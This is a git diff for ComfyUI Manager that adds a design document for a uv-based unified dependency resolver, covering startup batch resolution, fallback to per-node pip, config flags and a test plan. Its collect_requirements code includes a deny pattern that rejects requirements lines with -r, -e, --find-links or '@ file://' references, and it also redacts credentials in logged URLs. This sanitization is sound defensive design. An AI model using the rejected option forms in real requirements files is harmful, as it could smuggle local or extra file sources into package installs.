+ base_requirements=collect_base_requirements(comfy_path),
+ blacklist=set(),
+ overrides={},
+ downgrade_blacklist=[],
+ )
+ _result = _resolver.resolve_and_install()
+ if _result.success:
+ _unified_resolver_succeeded = True
+ logging.info("[UnifiedDepResolver] startup batch resolution succeeded")
+ else:
+ manager_util.use_unified_resolver = False
+ logging.warning("[UnifiedDepResolver] startup batch failed: %s, falling back to per-node pip", _result.error)
+ except UvNotAvailableError:
+ manager_util.use_unified_resolver = False
+ logging.warning("[UnifiedDepResolver] uv not available at startup, falling back to per-node pip")
+ except Exception as e:
+ manager_util.use_unified_resolver = False
+ logging.warning("[UnifiedDepResolver] startup error: %s, falling back to per-node pip", e)
+
# Check if script_list_path exists
if os.path.exists(script_list_path):
execute_startup_script()
diff --git a/docs/dev/DESIGN-unified-dependency-resolver.md b/docs/dev/DESIGN-unified-dependency-resolver.md
new file mode 100644
index 00000000..92d7324c
--- /dev/null
+++ b/docs/dev/DESIGN-unified-dependency-resolver.md
@@ -0,0 +1,777 @@
+# Architecture Design: Unified Dependency Resolver
+
+## 1. System Architecture
+
+### 1.1 Module Location
+
+```
+comfyui_manager/
+├── glob/
+│ └── manager_core.py # Existing: execute_install_script() call sites (2 locations)
+├── common/
+│ ├── manager_util.py # Existing: get_pip_cmd(), PIPFixer, use_uv flag
+│ ├── cm_global.py # Existing: pip_overrides, pip_blacklist (runtime dynamic assignment)
+│ └── unified_dep_resolver.py # New: Unified dependency resolution module
+├── prestartup_script.py # Existing: config reading, remap_pip_package, cm_global initialization
+└── legacy/
+ └── manager_core.py # Legacy (not a modification target)
+cm_cli/
+└── __main__.py # CLI entry: uv-compile command (on-demand batch resolution)
+```
+
+The new module `unified_dep_resolver.py` is added to the `comfyui_manager/common/` directory.
+It reuses `manager_util` utilities and `cm_global` global state from the same package.
+
+> **Warning**: `cm_global.pip_overrides`, `pip_blacklist`, `pip_downgrade_blacklist` are
+> NOT defined in `cm_global.py`. They are **dynamically assigned** during `prestartup_script.py` execution.
+> In v1 unified mode, these are **not applied** — empty values are passed to the resolver constructor.
+> The constructor interface accepts them for future extensibility (defaults to empty when `None`).
+>
+> **[DEFERRED]** Reading actual `cm_global` values at startup is deferred to a future version.
+> The startup batch resolver in `prestartup_script.py` currently passes `blacklist=set()`,
+> `overrides={}`, `downgrade_blacklist=[]`. The constructor and internal methods
+> (`_remap_package`, `_is_downgrade_blacklisted`, blacklist check) are fully implemented
+> and will work once real values are provided.
+
+### 1.2 Overall Flow
+
+```mermaid
+flowchart TD
+ subgraph INSTALL_TIME["Install Time (immediate)"]
+ MC["manager_core.py
execute_install_script() — 2 locations"]
+ MC -->|"use_unified_resolver=True"| SKIP["Skip per-node pip install
(deps deferred to restart)"]
+ MC -->|"use_unified_resolver=False"| PIP["Existing pip install loop"]
+ SKIP --> INST["Run install.py"]
+ PIP --> INST
+ end
+
+ subgraph STARTUP["ComfyUI Restart (prestartup_script.py)"]
+ CHK{use_unified_resolver?}
+ CHK -->|Yes| UDR
+ CHK -->|No| LAZY["execute_lazy_install_script()
per-node pip install (existing)"]
+
+ subgraph UDR["UnifiedDepResolver (batch)"]
+ S1["1. collect_requirements()
(ALL installed node packs)"]
+ S2["2. compile_lockfile()"]
+ S3["3. install_from_lockfile()"]
+ S1 --> S2 --> S3
+ end
+
+ UDR -->|Success| FIX["PIPFixer.fix_broken()"]
+ UDR -->|Failure| LAZY
+ LAZY --> FIX2["PIPFixer.fix_broken()"]
+ end
+```
+
+> **Key design change**: The unified resolver runs at **startup time** (module scope), not at install time.
+> At install time, `execute_install_script()` skips the pip loop when unified mode is active.
+> At startup, `prestartup_script.py` runs the resolver at module scope — unconditionally when enabled,
+> independent of `install-scripts.txt` existence. Blacklist/overrides/downgrade_blacklist are bypassed
+> (empty values passed); `uv pip compile` handles all conflict resolution natively.
+>
+> **Note**: `execute_install_script()` exists in 2 locations in the codebase (excluding legacy module).
+> - `UnifiedManager.execute_install_script()` (class method): Used for CNR installs, etc.
+> - Standalone function `execute_install_script()`: Used for updates, git installs, etc.
+> Both skip per-node pip install when unified mode is active.
+
+### 1.3 uv Command Strategy
+
+**`uv pip compile`** → Generates pinned requirements.txt (pip-compatible)
+- Do not confuse with `uv lock`
+- `uv lock` generates `uv.lock` (TOML) — cross-platform but incompatible with pip workflows
+- This design uses a pip-compatible workflow (`uv pip compile` → `uv pip install -r`)
+
+**`uv pip install -r`** ← Used instead of `uv pip sync`
+- `uv pip sync`: **Deletes** packages not in lockfile → Risk of removing torch, ComfyUI deps
+- `uv pip install -r`: Only performs additive installs, preserves existing packages → Safe
+
+---
+
+## 2. Class Design
+
+### 2.1 UnifiedDepResolver
+
+```python
+class UnifiedDepResolver:
+ """
+ Unified dependency resolver.
+
+ Resolves and installs all dependencies of (installed node packs + new node packs)
+ at once using uv.
+
+ Responsibility scope: Dependency resolution and installation only.
+ install.py execution and PIPFixer calls are handled by the caller (manager_core).
+ """
+
+ def __init__(
+ self,
+ node_pack_paths: list[str],
+ base_requirements: list[str] | None = None,
+ blacklist: set[str] | None = None,
+ overrides: dict[str, str] | None = None,
+ downgrade_blacklist: list[str] | None = None,
+ ):
+ """
+ Args:
+ node_pack_paths: List of node pack directory paths
+ base_requirements: Base dependencies (ComfyUI requirements, etc.)
+ blacklist: Blacklisted package set (default: empty set; not applied in v1 unified mode)
+ overrides: Package name remapping dict (default: empty dict; not applied in v1 unified mode)
+ downgrade_blacklist: Downgrade-prohibited package list (default: empty list; not applied in v1 unified mode)
+ """
+
+ def resolve_and_install(self) -> ResolveResult:
+ """Execute full pipeline: stale cleanup → collect → compile → install.
+ Calls cleanup_stale_tmp() at start to clean up residual files from previous abnormal terminations."""
+
+ def collect_requirements(self) -> CollectedDeps:
+ """Collect dependencies from all node packs"""
+
+ def compile_lockfile(self, deps: CollectedDeps) -> LockfileResult:
+ """Generate pinned requirements via uv pip compile"""
+
+ def install_from_lockfile(self, lockfile_path: str) -> InstallResult:
+ """Install from pinned requirements (uv pip install -r)"""
+```
+
+### 2.2 Data Classes
+
+```python
+@dataclass
+class PackageRequirement:
+ """Individual package dependency"""
+ name: str # Package name (normalized)
+ spec: str # Original spec (e.g., "torch>=2.0")
+ source: str # Source node pack path
+
+@dataclass
+class CollectedDeps:
+ """All collected dependencies"""
+ requirements: list[PackageRequirement] # Collected deps (duplicates allowed, uv resolves)
+ skipped: list[tuple[str, str]] # (package_name, skip_reason)
+ sources: dict[str, list[str]] # {package_name: [source_node_packs]}
+ extra_index_urls: list[str] # Additional index URLs separated from --index-url entries
+
+@dataclass
+class LockfileResult:
+ """Compilation result"""
+ success: bool
+ lockfile_path: str | None # pinned requirements.txt path
+ conflicts: list[str] # Conflict details
+ stderr: str # uv error output
+
+@dataclass
+class InstallResult:
+ """Installation result (uv pip install -r is atomic: all-or-nothing)"""
+ success: bool
+ installed: list[str] # Installed packages (stdout parsing)
+ skipped: list[str] # Already installed (stdout parsing)
+ stderr: str # uv stderr output (for failure analysis)
+
+@dataclass
+class ResolveResult:
+ """Full pipeline result"""
+ success: bool
+ collected: CollectedDeps | None
+ lockfile: LockfileResult | None
+ install: InstallResult | None
+ error: str | None
+```
+
+---
+
+## 3. Core Logic Details
+
+### 3.1 Dependency Collection (`collect_requirements`)
+
+```python
+# Input sanitization: dangerous patterns to reject
+_DANGEROUS_PATTERNS = re.compile(
+ r'^(-r\b|--requirement\b|-e\b|--editable\b|-c\b|--constraint\b'
+ r'|--find-links\b|-f\b|.*@\s*file://)',
+ re.IGNORECASE
+)
+
+def collect_requirements(self) -> CollectedDeps:
+ requirements = []
+ skipped = []
+ sources = defaultdict(list)
+ extra_index_urls = []
+
+ for path in self.node_pack_paths:
+ # Exclude disabled node packs (directory-based mechanism)
+ # Disabled node packs are actually moved to custom_nodes/.disabled/,
+ # so they should already be excluded from input at this point.
+ # Defensive check: new style (.disabled/ directory) + old style ({name}.disabled suffix)
+ if ('/.disabled/' in path
+ or os.path.basename(os.path.dirname(path)) == '.disabled'
+ or path.rstrip('/').endswith('.disabled')):
+ continue
+
+ req_file = os.path.join(path, "requirements.txt")
+ if not os.path.exists(req_file):
+ continue
+
+ # chardet-based encoding detection (existing robust_readlines pattern)
+ for line in self._read_requirements(req_file):
+ line = line.split('#')[0].strip()
+ if not line:
+ continue
+
+ # 0. Input sanitization (security)
+ if self._DANGEROUS_PATTERNS.match(line):
+ skipped.append((line, f"rejected: dangerous pattern in {path}"))
+ logging.warning(f"[UnifiedDepResolver] rejected dangerous line: '{line}' from {path}")
+ continue
+
+ # 1. Separate --index-url / --extra-index-url handling
+ # (BEFORE path separator check, because URLs contain '/')
+ if '--index-url' in line or '--extra-index-url' in line:
+ pkg_spec, index_url = self._split_index_url(line)
+ if index_url:
+ extra_index_urls.append(index_url)
+ line = pkg_spec
+ if not line:
+ # Standalone option line (no package prefix)
+ continue
+
+ # 1b. Reject path separators in package name portion
+ pkg_name_part = re.split(r'[><=!~;]', line)[0]
+ if '/' in pkg_name_part or '\\' in pkg_name_part:
+ skipped.append((line, f"rejected: path separator in package name"))
+ continue
+
+ # 2. Apply remap_pip_package (using cm_global.pip_overrides)
+ pkg_spec = self._remap_package(line)
+
+ # 3. Blacklist check (cm_global.pip_blacklist)
+ pkg_name = self._extract_package_name(pkg_spec)
+ if pkg_name in self.blacklist:
+ skipped.append((pkg_spec, "blacklisted"))
+ continue
+
+ # 4. Downgrade blacklist check (includes version comparison)
+ if self._is_downgrade_blacklisted(pkg_name, pkg_spec):
+ skipped.append((pkg_spec, "downgrade blacklisted"))
+ continue
+
+ # 5. Collect (no dedup — uv handles resolution)
+ req = PackageRequirement(
+ name=pkg_name,
+ spec=pkg_spec,
+ source=path,
+ )
+ requirements.append(req)
+ sources[pkg_name].append(path)
+
+ return CollectedDeps(
+ requirements=requirements,
+ skipped=skipped,
+ sources=dict(sources),
+ extra_index_urls=list(set(extra_index_urls)), # Deduplicate
+ )
+
+def _split_index_url(self, line: str) -> tuple[str, str | None]:
+ """Split 'package_name --index-url URL' → (package_name, URL).
+
+ Also handles standalone ``--index-url URL`` and
+ ``--extra-index-url URL`` lines (with no package prefix).
+ """
+ # Handle --extra-index-url first (contains '-index-url' as substring
+ # but NOT '--index-url' due to the extra-index prefix)
+ for option in ('--extra-index-url', '--index-url'):
+ if option in line:
+ parts = line.split(option, 1)
+ pkg_spec = parts[0].strip()
+ url = parts[1].strip() if len(parts) == 2 else None
+ return pkg_spec, url
+ return line, None
+
+def _is_downgrade_blacklisted(self, pkg_name: str, pkg_spec: str) -> bool:
+ """Reproduce the downgrade version comparison from existing is_blacklisted() logic.
+
+ Same logic as manager_core.py's is_blacklisted():
+ - No version spec and already installed → block (prevent reinstall)
+ - Operator is one of ['<=', '==', '<', '~='] and
+ installed version >= requested version → block (prevent downgrade)
+ - Version comparison uses manager_util.StrictVersion (NOT packaging.version)
+ """
+ if pkg_name not in self.downgrade_blacklist:
+ return False
+
+ installed_packages = manager_util.get_installed_packages()
+
+ # Version spec parsing (same pattern as existing is_blacklisted())
+ pattern = r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
+ match = re.search(pattern, pkg_spec)
+
+ if match is None:
+ # No version spec: prevent reinstall if already installed
+ if pkg_name in installed_packages:
+ return True
+ elif match.group(2) in ['<=', '==', '<', '~=']:
+ # Downgrade operator: block if installed version >= requested version
+ if pkg_name in installed_packages:
+ try:
+ installed_ver = manager_util.StrictVersion(installed_packages[pkg_name])
+ requested_ver = manager_util.StrictVersion(match.group(3))
+ if installed_ver >= requested_ver:
+ return True
+ except (ValueError, TypeError):
+ logging.warning(f"[UnifiedDepResolver] version parse failed: {pkg_spec}")
+ return False
+
+ return False
+
+def _remap_package(self, pkg: str) -> str:
+ """Package name remapping based on cm_global.pip_overrides.
+ Reuses existing remap_pip_package() logic."""
+ if pkg in self.overrides:
+ remapped = self.overrides[pkg]
+ logging.info(f"[UnifiedDepResolver] '{pkg}' remapped to '{remapped}'")
+ return remapped
+ return pkg
+```
+
+### 3.2 Lockfile Generation (`compile_lockfile`)
+
+**Behavior:**
+1. Create a unique temp directory (`tempfile.mkdtemp(prefix="comfyui_resolver_")`) for concurrency safety
+2. Write collected requirements and base constraints to temp files
+3. Execute `uv pip compile` with options:
+ - `--output-file` (pinned requirements path within temp dir)
+ - `--python` (current interpreter)
+ - `--constraint` (base dependencies)
+ - `--extra-index-url` (from `CollectedDeps.extra_index_urls`, logged via `_redact_url()`)
+4. Timeout: 300s — returns `LockfileResult(success=False)` on `TimeoutExpired`
+5. On `returncode != 0`: parse stderr for conflict details via `_parse_conflicts()`
+6. Post-success verification: confirm lockfile was actually created (handles edge case of `returncode==0` without output)
+7. Temp directory cleanup: `shutil.rmtree()` in `except` block; on success, caller (`resolve_and_install`'s `finally`) handles cleanup
+
+### 3.3 Dependency Installation (`install_from_lockfile`)
+
+**Behavior:**
+1. Execute `uv pip install --requirement --python `
+ - **NOT `uv pip sync`** — sync deletes packages not in lockfile (dangerous for torch, ComfyUI deps)
+2. `uv pip install -r` is **atomic** (all-or-nothing): no partial failure
+3. Timeout: 600s — returns `InstallResult(success=False)` on `TimeoutExpired`
+4. On success: parse stdout via `_parse_install_output()` to populate `installed`/`skipped` lists
+5. On failure: `stderr` captures the failure cause; `installed=[]` (atomic model)
+
+### 3.4 uv Command Resolution
+
+**`_get_uv_cmd()` resolution order** (mirrors existing `get_pip_cmd()` pattern):
+1. **Module uv**: `[sys.executable, '-m', 'uv']` (with `-s` flag for embedded Python — note: `python_embeded` spelling is intentional, matching ComfyUI Windows distribution path)
+2. **Standalone uv**: `['uv']` via `shutil.which('uv')`
+3. **Not found**: raises `UvNotAvailableError` → caught by caller for pip fallback
+
+### 3.5 Stale Temp File Cleanup
+
+**`cleanup_stale_tmp(max_age_seconds=3600)`** — classmethod, called at start of `resolve_and_install()`:
+- Scans `tempfile.gettempdir()` for directories with prefix `comfyui_resolver_`
+- Deletes directories older than `max_age_seconds` (default: 1 hour)
+- Silently ignores `OSError` (permission issues, etc.)
+
+### 3.6 Credential Redaction
+
+```python
+_CREDENTIAL_PATTERN = re.compile(r'://([^@]+)@')
+
+def _redact_url(self, url: str) -> str:
+ """Mask authentication info in URLs. user:pass@host → ****@host"""
+ return self._CREDENTIAL_PATTERN.sub('://****@', url)
+```
+
+All `--extra-index-url` logging passes through `_redact_url()`:
+```python
+# Logging example within compile_lockfile()
+for url in deps.extra_index_urls:
+ logging.info(f"[UnifiedDepResolver] extra-index-url: {self._redact_url(url)}")
+ cmd += ["--extra-index-url", url] # Original URL passed to actual command
+```
+
+---
+
+## 4. Existing Code Integration
+
+### 4.1 manager_core.py Modification Points
+
+**2 `execute_install_script()` locations — both skip deps in unified mode:**
+
+#### 4.1.1 UnifiedManager.execute_install_script() (Class Method)
+
+#### 4.1.2 Standalone Function execute_install_script()
+
+**Both locations use the same pattern when unified mode is active:**
+
+1. `lazy_mode=True` → schedule and return early (unchanged)
+2. If `not no_deps and manager_util.use_unified_resolver`:
+ - **Skip** the `requirements.txt` pip install loop entirely (deps deferred to startup)
+ - Log: `"[UnifiedDepResolver] deps deferred to startup batch resolution"`
+3. If `not manager_util.use_unified_resolver`: existing pip install loop runs (unchanged)
+4. `install.py` execution: **always runs immediately** regardless of resolver mode
+
+> **Parameter ordering differs:**
+> - Method: `(self, url, repo_path, instant_execution, lazy_mode, no_deps)`
+> - Standalone: `(url, repo_path, lazy_mode, instant_execution, no_deps)`
+
+### 4.1.3 Startup Batch Resolver (`prestartup_script.py`)
+
+**New**: Runs unified resolver at **module scope** — unconditionally when enabled, independent of `install-scripts.txt` existence.
+
+**Execution point**: After config reading and `cm_global` initialization, **before** the `execute_startup_script()` gate.
+
+**Logic** (uses module-level helpers from `unified_dep_resolver.py`):
+1. `collect_node_pack_paths(folder_paths.get_folder_paths('custom_nodes'))` — enumerate all installed node pack directories
+2. `collect_base_requirements(comfy_path)` — read `requirements.txt` + `manager_requirements.txt` from ComfyUI root (base deps only)
+3. Create `UnifiedDepResolver` with **empty** blacklist/overrides/downgrade_blacklist (uv handles resolution natively; interface preserved for extensibility)
+4. Call `resolve_and_install()` → on success set `_unified_resolver_succeeded = True`
+5. On failure (including `UvNotAvailableError`): log warning, fall back to per-node pip
+
+> `manager_requirements.txt` is read **only** from `comfy_path` (ComfyUI base), never from node packs.
+> Node packs' `requirements.txt` are collected by the resolver's `collect_requirements()` method.
+
+### 4.1.5 `execute_lazy_install_script()` Modification
+
+When unified resolver **succeeds**, `execute_lazy_install_script()` skips the per-node pip install loop
+(deps already batch-resolved at module scope). `install.py` still runs per node pack.
+
+```python
+# In execute_lazy_install_script():
+if os.path.exists(requirements_path) and not _unified_resolver_succeeded:
+ # Per-node pip install: only runs if unified resolver is disabled or failed
+ ...
+# install.py always runs regardless
+```
+
+> **Note**: Gated on `_unified_resolver_succeeded` (success flag), NOT `use_unified_resolver` (enable flag).
+> If the resolver is enabled but fails, `_unified_resolver_succeeded` remains False → per-node pip runs as fallback.
+
+### 4.1.6 CLI Integration
+
+Two entry points expose the unified resolver in `cm_cli`:
+
+#### 4.1.6.1 Standalone Command: `cm_cli uv-compile`
+
+On-demand batch resolution — independent of ComfyUI startup.
+
+```bash
+cm_cli uv-compile [--user-directory DIR]
+```
+
+Resolves all installed node packs' dependencies at once. Useful for environment
+recovery or initial setup without starting ComfyUI.
+`PIPFixer.fix_broken()` runs after resolution (via `finally` — runs on both success and failure).
+
+#### 4.1.6.2 Install Flag: `cm_cli install --uv-compile`
+
+```bash
+cm_cli install [node2 ...] --uv-compile [--mode remote]
+```
+
+When `--uv-compile` is set:
+1. `no_deps` is forced to `True` → per-node pip install is skipped during each node installation
+2. After **all** nodes are installed, runs unified batch resolution over **all installed node packs**
+ (not just the newly installed ones — `uv pip compile` needs the complete dependency graph)
+3. `PIPFixer.fix_broken()` runs after resolution (via `finally` — runs on both success and failure)
+
+This differs from per-node pip install: instead of resolving each node pack's
+`requirements.txt` independently, all deps are compiled together to avoid conflicts.
+
+#### Shared Design Decisions
+
+- **Uses real `cm_global` values**: Unlike the startup path (4.1.3) which passes empty
+ blacklist/overrides, CLI commands pass `cm_global.pip_blacklist`,
+ `cm_global.pip_overrides`, and `cm_global.pip_downgrade_blacklist` — already
+ initialized at `cm_cli/__main__.py` module scope (lines 45-60).
+- **No `_unified_resolver_succeeded` flag**: Not needed — these are one-shot commands,
+ not startup gates.
+- **Shared helper**: Both entry points delegate to `_run_unified_resolve()` which
+ handles resolver instantiation, execution, and result reporting.
+- **Error handling**: `UvNotAvailableError` / `ImportError` → exit 1 with message.
+ Both entry points use `try/finally` to guarantee `PIPFixer.fix_broken()` runs
+ regardless of resolution outcome.
+
+**Node pack discovery**: Uses `cmd_ctx.get_custom_nodes_paths()` → `collect_node_pack_paths()`,
+which is the CLI-native path resolution (respects `--user-directory` and `folder_paths`).
+
+### 4.2 Configuration Addition (config.ini)
+
+```ini
+[default]
+# Existing settings...
+use_unified_resolver = false # Enable unified dependency resolution
+```
+
+### 4.3 Configuration Reading
+
+Follows the existing `read_uv_mode()` / `use_uv` pattern:
+- `prestartup_script.py`: `read_unified_resolver_mode()` reads from `default_conf` → sets `manager_util.use_unified_resolver`
+- `manager_core.py`: `read_config()` / `write_config()` / `get_config()` include `use_unified_resolver` key
+- `read_config()` exception fallback must include `use_unified_resolver` key to prevent `KeyError` in `write_config()`
+
+### 4.4 manager_util.py Extension
+
+```python
+# manager_util.py
+use_unified_resolver = False # New global flag (separate from use_uv)
+```
+
+---
+
+## 5. Error Handling Strategy
+
+```mermaid
+flowchart TD
+ STARTUP["prestartup_script.py startup"]
+ STARTUP --> CHK{use_unified_resolver?}
+ CHK -->|No| SKIP_UDR["Skip → execute_lazy_install_script per-node pip"]
+
+ CHK -->|Yes| RAI["run_unified_resolver()"]
+ RAI --> STALE["cleanup_stale_tmp()
Clean stale temp dirs (>1 hour old)"]
+ STALE --> UV_CHK{uv installed?}
+ UV_CHK -->|No| UV_ERR["UvNotAvailableError
→ Fallback: execute_lazy_install_script per-node pip"]
+
+ UV_CHK -->|Yes| CR["collect_requirements()
(ALL installed node packs)"]
+ CR --> CR_DIS[".disabled/ path → auto-skip"]
+ CR --> CR_PARSE["Parse failure → skip node pack, continue"]
+ CR --> CR_ENC["Encoding detection failure → assume UTF-8"]
+ CR --> CR_DANGER["Dangerous pattern detected → reject line + log"]
+ CR --> CR_DG["Downgrade blacklist → skip after version comparison"]
+
+ CR --> CL["compile_lockfile()"]
+ CL --> CL_CONFLICT["Conflict → report + per-node pip fallback"]
+ CL --> CL_TIMEOUT["TimeoutExpired 300s → per-node pip fallback"]
+ CL --> CL_NOFILE["Lockfile not created → failure + fallback"]
+ CL --> CL_TMP["Temp directory → finally block cleanup"]
+
+ CL -->|Success| IL["install_from_lockfile()"]
+ IL --> IL_OK["Total success → parse installed/skipped"]
+ IL --> IL_FAIL["Total failure → stderr + per-node pip fallback (atomic)"]
+ IL --> IL_TIMEOUT["TimeoutExpired 600s → fallback"]
+
+ IL_OK --> PF["PIPFixer.fix_broken()
Restore torch/opencv/frontend"]
+ PF --> LAZY["execute_lazy_install_script()
(install.py only, deps skipped)"]
+```
+
+> **Fallback model**: On resolver failure at startup, `execute_lazy_install_script()` runs normally
+> (per-node pip install), providing the same behavior as if unified mode were disabled.
+
+---
+
+## 6. File Structure
+
+### 6.1 New Files
+
+```
+comfyui_manager/common/unified_dep_resolver.py # Main module (~350 lines, includes sanitization/downgrade logic)
+tests/test_unified_dep_resolver.py # Unit tests
+```
+
+### 6.2 Modified Files
+
+```
+comfyui_manager/glob/manager_core.py # Skip per-node pip in unified mode (2 execute_install_script locations)
+comfyui_manager/common/manager_util.py # Add use_unified_resolver flag
+comfyui_manager/prestartup_script.py # Config reading + startup batch resolver + execute_lazy_install_script modification
+```
+
+> **Not modified**: `comfyui_manager/legacy/manager_core.py` (legacy paths retain existing pip behavior)
+
+---
+
+## 7. Dependencies
+
+| Dependency | Purpose | Notes |
+|-----------|---------|-------|
+| `uv` | Dependency resolution and installation | Already included in project dependencies |
+| `cm_global` | pip_overrides, pip_blacklist, pip_downgrade_blacklist | Reuse existing global state (runtime dynamic assignment) |
+| `manager_util` | StrictVersion, get_installed_packages, use_unified_resolver flag | Reuse existing utilities |
+| `tempfile` | Temporary requirements files, mkdtemp | Standard library |
+| `subprocess` | uv process execution | Standard library |
+| `dataclasses` | Result data structures | Standard library |
+| `re` | Input sanitization, version spec parsing, credential redaction | Standard library |
+| `shutil` | uv lookup (`which`), temp directory cleanup | Standard library |
+| `time` | Stale temp file age calculation | Standard library |
+| `logging` | Per-step logging | Standard library |
+
+No additional external dependencies.
+
+---
+
+## 8. Sequence Diagram
+
+### Install Time + Startup Batch Resolution
+
+```mermaid
+sequenceDiagram
+ actor User
+ participant MC as manager_core
+ participant PS as prestartup_script
+ participant UDR as UnifiedDepResolver
+ participant UV as uv (CLI)
+
+ Note over User,MC: Install Time (immediate)
+ User->>MC: Install node pack X
+ MC->>MC: Git clone / download X
+ MC->>MC: Skip per-node pip (unified mode)
+ MC->>MC: Run X's install.py
+ MC-->>User: Node pack installed (deps pending)
+
+ Note over User,UV: ComfyUI Restart
+ User->>PS: Start ComfyUI
+ PS->>PS: Check use_unified_resolver
+ PS->>UDR: Create resolver (module scope)
+ UDR->>UDR: collect_requirements()
(ALL installed node packs)
+ UDR->>UV: uv pip compile --output-file
+ UV-->>UDR: pinned reqs.txt
+ UDR->>UV: uv pip install -r
+ UV-->>UDR: Install result
+ UDR-->>PS: ResolveResult(success=True)
+ PS->>PS: PIPFixer.fix_broken()
+ PS->>PS: execute_lazy_install_script()
(install.py only, deps skipped)
+ PS-->>User: ComfyUI ready
+```
+
+---
+
+## 9. Test Strategy
+
+### 9.1 Unit Tests
+
+| Test Target | Cases |
+|------------|-------|
+| `collect_requirements` | Normal parsing, empty file, blacklist filtering, comment handling, remap application |
+| `.disabled` filtering | Exclude node packs within `.disabled/` directory path (directory-based mechanism) |
+| Input sanitization | Reject lines with `-r`, `-e`, `--find-links`, `@ file://`, path separators |
+| `--index-url` / `--extra-index-url` separation | `package --index-url URL`, standalone `--index-url URL`, standalone `--extra-index-url URL`, `package --extra-index-url URL` → package spec + extra_index_urls separation |
+| Downgrade blacklist | Installed + lower version request → skip, not installed → pass, same/higher version → pass |
+| `compile_lockfile` | Normal compilation, conflict detection, TimeoutExpired, constraint application, --output-file verification |
+| Lockfile existence verification | Failure handling when file not created despite returncode==0 |
+| `extra_index_urls` passthrough | Verify `--extra-index-url` argument included in compile command |
+| `install_from_lockfile` | Normal install, total failure, TimeoutExpired |
+| Atomic model | On failure: installed=[], stderr populated |
+| `_get_uv_cmd` | Module uv, standalone uv, embedded python (`python_embeded`), not installed |
+| `_remap_package` | pip_overrides remapping, unregistered packages |
+| Blacklist | torch family, torchsde, custom blacklist |
+| Duplicate handling | Same package with multiple specs → all passed to uv |
+| Multiple paths | Collection from multiple custom_nodes paths |
+| `cm_global` defense | Default values used when `pip_blacklist` etc. not assigned |
+| Concurrency | Two resolver instances each use unique temp directories |
+| Credential redaction | `user:pass@host` URL masked in log output |
+| `_redact_url` | `://user:pass@host` → `://****@host` conversion, no-credential URL passthrough |
+| `cleanup_stale_tmp` | Delete stale dirs >1 hour, preserve recent dirs, ignore permission errors |
+| Downgrade operators | `<=`, `==`, `<`, `~=` blocked; `>=`, `>`, `!=` pass; no spec + installed → blocked |
+| `StrictVersion` comparison | Verify `manager_util.StrictVersion` is used (not `packaging.version`) |
+
+### 9.2 Integration Tests
+
+- End-to-end test in real uv environment
+- Existing pip fallback path test
+- config.ini setting toggle test
+- Environment integrity verification after PIPFixer call
+- lazy_mode scheduling behavior verification (Windows simulation)
+- `use_uv=False` + `use_unified_resolver=True` combination test
+- Large-scale dependency (50+ node packs) performance test
+
+---
+
+## 10. Implementation Order
+
+1. **Phase 1**: Data classes and `collect_requirements` implementation + tests
+ - PackageRequirement, CollectedDeps (including extra_index_urls) and other data classes
+ - Blacklist/override filtering
+ - **Downgrade blacklist** (version comparison logic included)
+ - **Input sanitization** (-r, -e, @ file:// etc. rejection)
+ - **`--index-url` / `--extra-index-url` separation handling** (package spec + extra_index_urls)
+ - **`.disabled` node pack filtering**
+ - Defensive cm_global access (getattr pattern)
+2. **Phase 2**: `compile_lockfile` implementation + tests
+ - uv pip compile invocation
+ - --output-file, --constraint, --python options
+ - Conflict parsing logic
+3. **Phase 3**: `install_from_lockfile` implementation + tests
+ - uv pip install -r invocation (NOT sync)
+ - Install result parsing
+4. **Phase 4**: Integration — startup batch + install-time skip
+ - `prestartup_script.py`: Module-scope startup batch resolver + `execute_lazy_install_script()` deps skip
+ - `manager_core.py`: Skip per-node pip in 2 `execute_install_script()` locations
+ - `manager_util.py`: `use_unified_resolver` flag
+ - Config reading (`read_unified_resolver_mode()`, `read_config()`/`write_config()`)
+5. **Phase 5**: Integration tests + fallback verification + startup batch tests
+
+---
+
+## Appendix A: Existing Code Reference
+
+> **Note**: Line numbers may shift as code changes, so references use symbol names (function/class names).
+> Use `grep -n` or IDE symbol search for exact locations.
+
+### remap_pip_package Location (Code Duplication Exists)
+
+```
+comfyui_manager/glob/manager_core.py — def remap_pip_package(pkg)
+comfyui_manager/prestartup_script.py — def remap_pip_package(pkg)
+```
+
+Both reference `cm_global.pip_overrides` with identical logic.
+The unified resolver uses `cm_global.pip_overrides` directly to avoid adding more duplication.
+
+### cm_global Global State
+
+```python
+# Dynamically assigned in prestartup_script.py (NOT defined in cm_global.py!)
+cm_global.pip_blacklist = {'torch', 'torchaudio', 'torchsde', 'torchvision'} # set
+cm_global.pip_overrides = {} # dict, loaded from JSON
+cm_global.pip_downgrade_blacklist = [ # list
+ 'torch', 'torchaudio', 'torchsde', 'torchvision',
+ 'transformers', 'safetensors', 'kornia'
+]
+```
+
+> **cm_cli path**: `cm_cli/__main__.py` also independently initializes these attributes.
+> If the resolver may be called from the CLI path, this initialization should also be verified.
+
+### PIPFixer Call Pattern
+
+```python
+# Within UnifiedManager.execute_install_script() method in manager_core.py:
+pip_fixer = manager_util.PIPFixer(
+ manager_util.get_installed_packages(),
+ context.comfy_path,
+ context.manager_files_path
+)
+# ... (after installation)
+pip_fixer.fix_broken()
+```
+
+The unified resolver does not call PIPFixer directly.
+The caller (execute_install_script) calls PIPFixer as part of the existing flow.
+
+### is_blacklisted() Logic (Must Be Reproduced in Unified Resolver)
+
+```python
+# manager_core.py — def is_blacklisted(name)
+# 1. Simple pip_blacklist membership check
+# 2. pip_downgrade_blacklist version comparison:
+# - Parse spec with regex r'([^<>!~=]+)([<>!~=]=?)([^ ]*)'
+# - match is None (no version spec) + installed → block
+# - Operator in ['<=', '==', '<', '~='] + installed version >= requested version → block
+# - Version comparison uses manager_util.StrictVersion (NOT packaging.version)
+```
+
+The unified resolver's `_is_downgrade_blacklisted()` method faithfully reproduces this logic.
+It uses `manager_util.StrictVersion` instead of `packaging.version.parse()` to ensure consistency with existing behavior.
+
+### Existing Code --index-url Handling (Asymmetric)
+
+```python
+# Only exists in standalone function execute_install_script():
+if '--index-url' in package_name:
+ s = package_name.split('--index-url')
+ install_cmd = manager_util.make_pip_cmd(["install", s[0].strip(), '--index-url', s[1].strip()])
+
+# UnifiedManager.execute_install_script() method does NOT have this handling
+```
+
+The unified resolver unifies both paths for consistent handling via `_split_index_url()`.
diff --git a/docs/dev/PRD-unified-dependency-resolver.md b/docs/dev/PRD-unified-dependency-resolver.md
new file mode 100644
index 00000000..2e8fb593
--- /dev/null
+++ b/docs/dev/PRD-unified-dependency-resolver.md
@@ -0,0 +1,357 @@
+# PRD: Unified Dependency Resolver
+
+## 1. Overview
+
+### 1.1 Background
